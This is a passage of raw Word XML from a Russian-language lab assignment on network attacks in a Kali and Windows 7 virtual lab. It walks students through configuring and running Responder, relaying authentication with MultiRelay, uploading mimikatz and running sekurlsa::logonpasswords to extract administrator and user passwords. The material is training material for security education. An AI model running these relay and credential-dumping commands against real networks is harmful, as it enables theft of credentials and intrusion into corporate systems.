    <w:p w14:paraId="31A271A8" w14:textId="0D51D061" w:rsidR="00A93EE4" w:rsidRPr="00A93EE4" w:rsidRDefault="00A93EE4" w:rsidP="00B82D89">
      <w:r w:rsidRPr="00A93EE4">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для внесения ясности в формулировку команды, найдите её элементы в официальном справочнике по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>https://kali.tools/?p=1679</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752EBE5" w14:textId="535816AA" w:rsidR="00CB02E4" w:rsidRPr="00A93EE4" w:rsidRDefault="000E3224" w:rsidP="00B82D89">
      <w:r w:rsidRPr="00742EBE">
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00017D46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003324E9" w:rsidRPr="003324E9">
        <w:t>Возвращаемся в прошлый терминал</w:t>
      </w:r>
      <w:r w:rsidR="00017D46">
        <w:t xml:space="preserve"> и отредактируем файл настроек </w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4">
        <w:t xml:space="preserve">через </w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4" w:rsidRPr="00A93EE4">
        <w:t>консольный текстовый редактор</w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7330A84C" w14:textId="482A46D5" w:rsidR="003324E9" w:rsidRPr="00A93EE4" w:rsidRDefault="00A51DDF" w:rsidP="00B82D89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 w:rsidR="003324E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003324E9" w:rsidRPr="00A93EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F4B27">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F4B27">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F4B27">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/responder/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003324E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r w:rsidR="003324E9" w:rsidRPr="00A93EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003324E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CB57255" w14:textId="1C61DBB8" w:rsidR="00132315" w:rsidRPr="00CD5EB5" w:rsidRDefault="003324E9" w:rsidP="00132315">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:t>Ставим</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00132315" w:rsidRPr="00CD5EB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C514484" w14:textId="77777777" w:rsidR="00A51DDF" w:rsidRDefault="00826523" w:rsidP="003324E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidR="00B67ABD" w:rsidRPr="003A506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A51DDF" w:rsidRPr="00A51DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A51DDF" w:rsidRPr="00A51DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> responder -I eth0</w:t>
      </w:r>
      <w:r w:rsidR="00A51DDF" w:rsidRPr="00A51DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DEEC17" w14:textId="681D6FA7" w:rsidR="003324E9" w:rsidRPr="008E63B6" w:rsidRDefault="00FE0AEE" w:rsidP="003324E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E63B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r>
        <w:t>Переключаемся</w:t>
      </w:r>
      <w:r w:rsidRPr="008E63B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="008E63B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008E63B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813D505" w14:textId="77777777" w:rsidR="00A6515D" w:rsidRPr="000478A8" w:rsidRDefault="00A6515D" w:rsidP="00A6515D">
      <w:r w:rsidRPr="00742EBE">
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.1. Нажать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidRPr="000478A8">
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDFF02B" w14:textId="77777777" w:rsidR="00A6515D" w:rsidRPr="00826DB1" w:rsidRDefault="00A6515D" w:rsidP="00A6515D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00C65DE1">
        <w:t xml:space="preserve">.2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ввести </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidR="009D2584" w:rsidRPr="00A667CD">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>\\</w:t>
        </w:r>
        <w:r w:rsidR="009D2584" w:rsidRPr="00A667CD">
          <w:rPr>
            <w:rStyle w:val="af1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>test</w:t>
        </w:r>
        <w:r w:rsidR="009D2584" w:rsidRPr="00826DB1">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="190D62D0" w14:textId="77777777" w:rsidR="009D2584" w:rsidRPr="00826DB1" w:rsidRDefault="009D2584" w:rsidP="00A6515D">
      <w:r w:rsidRPr="00826DB1">
        <w:t xml:space="preserve">13. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Вернуться в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="00826DB1" w:rsidRPr="00826DB1">
        <w:t xml:space="preserve"> и получить </w:t>
      </w:r>
      <w:r w:rsidR="00826DB1">
        <w:t>похожий результат</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31947A17" w14:textId="77777777" w:rsidR="00FE0AEE" w:rsidRDefault="00E62B38" w:rsidP="00D523CB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:commentRangeStart w:id="9"/>
      <w:r w:rsidRPr="00E62B38">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79536F4F" wp14:editId="10E21FA4">
            <wp:extent cx="6480175" cy="48793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 w:rsidR="009E6CEC">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="9"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920B795" w14:textId="2FA6C88C" w:rsidR="00CF6C27" w:rsidRPr="003A506B" w:rsidRDefault="00CF6C27" w:rsidP="001107A6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. Введите команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6C27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и убедитесь, что вы видите </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF6C27">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">адрес Вашего компьютера на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6C27">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (10.0.2.15)</w:t>
      </w:r>
      <w:r w:rsidR="003A506B">
        <w:t xml:space="preserve">. Если </w:t>
      </w:r>
      <w:r w:rsidR="003A506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="003A506B" w:rsidRPr="003A506B">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003A506B">
        <w:t>адрес не совпадает, обратите внимание какой из компьютеров Вы стали слушать в пункте 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DD4E91" w14:textId="0A28A58F" w:rsidR="00CF6C27" w:rsidRPr="00B60F19" w:rsidRDefault="00CF6C27" w:rsidP="001107A6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15. </w:t>
      </w:r>
      <w:r w:rsidR="00A93EE4">
        <w:t xml:space="preserve">В окне </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A93EE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MultiRelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A93EE4">
        <w:t xml:space="preserve"> в</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ведите команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6C27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и обратите внимание какое количество инструментов возможно теперь использовать для атаки на сеть предприятия</w:t>
      </w:r>
      <w:r w:rsidR="00B9706B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C847F" w14:textId="6272B02B" w:rsidR="00B23361" w:rsidRDefault="00B23361">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A1ECB4" w14:textId="77777777" w:rsidR="00BE6E86" w:rsidRDefault="00B33AE9" w:rsidP="00E62B38">
      <w:r w:rsidRPr="00BE6E86">
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A93925" w:rsidRPr="00BE6E86">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6E86">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Ввести</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>upload</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resources</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t>64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86">
        <w:t>пояснить</w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86" w:rsidRPr="00BE6E86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE6E86">
        <w:t>зачем нужна данная команда).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0185EA87" w14:textId="51B50C90" w:rsidR="00BE6E86" w:rsidRPr="00BE6E86" w:rsidRDefault="00BE6E86" w:rsidP="00E62B38">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>runas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Windows\Temp\mimikatz.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">debug </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:commentRangeStart w:id="10"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:commentRangeEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="10"/>
      </w:r>
      <w:r w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidR="00B33AE9" w:rsidRPr="00BE6E86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6913C231" w14:textId="7A181085" w:rsidR="00E62B38" w:rsidRPr="00BE6E86" w:rsidRDefault="00316469" w:rsidP="002C2627">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00316469">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delete /windows/temp/mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49ED07" w14:textId="77777777" w:rsidR="00F92AB8" w:rsidRDefault="007F46BD" w:rsidP="00F92AB8">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F46BD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE48675" wp14:editId="530712F7">
            <wp:extent cx="6480175" cy="45948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5302" w14:textId="6B32E4F4" w:rsidR="00D25E99" w:rsidRPr="00D25E99" w:rsidRDefault="00CF6C27" w:rsidP="000306F4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF6C27">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A93925" w:rsidRPr="00A93925">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6C27">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>изучите содержимое полученной информации и найдите</w:t>
      </w:r>
      <w:r w:rsidR="00D25E99">
        <w:t xml:space="preserve"> логин и пароль всех компьютеров, подключенных к сети </w:t>
      </w:r>
      <w:r w:rsidR="00D25E99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eth</w:t>
      </w:r>
      <w:r w:rsidR="00D25E99" w:rsidRPr="00D25E99">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="000306F4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:commentRangeStart w:id="11"/>
      <w:r w:rsidR="00D25E99">
        <w:t xml:space="preserve">Сделайте </w:t>
      </w:r>
      <w:commentRangeEnd w:id="11"/>
      <w:r w:rsidR="009E6CEC">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="11"/>
      </w:r>
      <w:r w:rsidR="00D25E99">
        <w:t xml:space="preserve">скриншот, где виден пароль администратора и пользователя </w:t>
      </w:r>
      <w:r w:rsidR="00D25E99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00D25E99" w:rsidRPr="00D25E99">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF7C63" w14:textId="2CEF3139" w:rsidR="00137775" w:rsidRPr="008F4D2E" w:rsidRDefault="00137775" w:rsidP="000306F4">
      <w:r w:rsidRPr="008F4D2E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A93925" w:rsidRPr="001E2EE2">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4D2E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Остановить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4D2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multirelay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7653A626" w14:textId="77777777" w:rsidR="001C25D6" w:rsidRPr="008F4D2E" w:rsidRDefault="001C25D6">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008F4D2E">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219E4E3" w14:textId="7E6E0877" w:rsidR="0016052D" w:rsidRPr="0016052D" w:rsidRDefault="00CD62DA" w:rsidP="0016052D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>III</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>. Анализ результатов и получение исходной информации для получения вывода к работе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E8D4A" w14:textId="77777777" w:rsidR="007F46BD" w:rsidRDefault="008F4D2E" w:rsidP="008F4D2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="008F4D2E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3E322" w14:textId="5A9558AB" w:rsidR="008F4D2E" w:rsidRPr="001718F4" w:rsidRDefault="000B1B46" w:rsidP="008F4D2E">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="008F4D2E" w:rsidRPr="001718F4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B1B46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B1B46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> responder-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B1B46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RunFinger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B1B46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B1B46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B1B46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D5B41" w14:textId="3C685176" w:rsidR="00854A47" w:rsidRDefault="000B1B46" w:rsidP="008F4D2E">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001718F4" w:rsidRPr="001718F4">
        <w:t>. Проанализировать результат</w:t>
      </w:r>
      <w:r w:rsidR="009E6CEC">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5592FC81" w14:textId="238B72AD" w:rsidR="009E6CEC" w:rsidRDefault="00FA501D" w:rsidP="008F4D2E">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009E6CEC">
        <w:t xml:space="preserve">.1. Какие задачи выполняет инструмент </w:t>
      </w:r>
      <w:r w:rsidR="009E6CEC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6CEC" w:rsidRPr="009E6CEC">
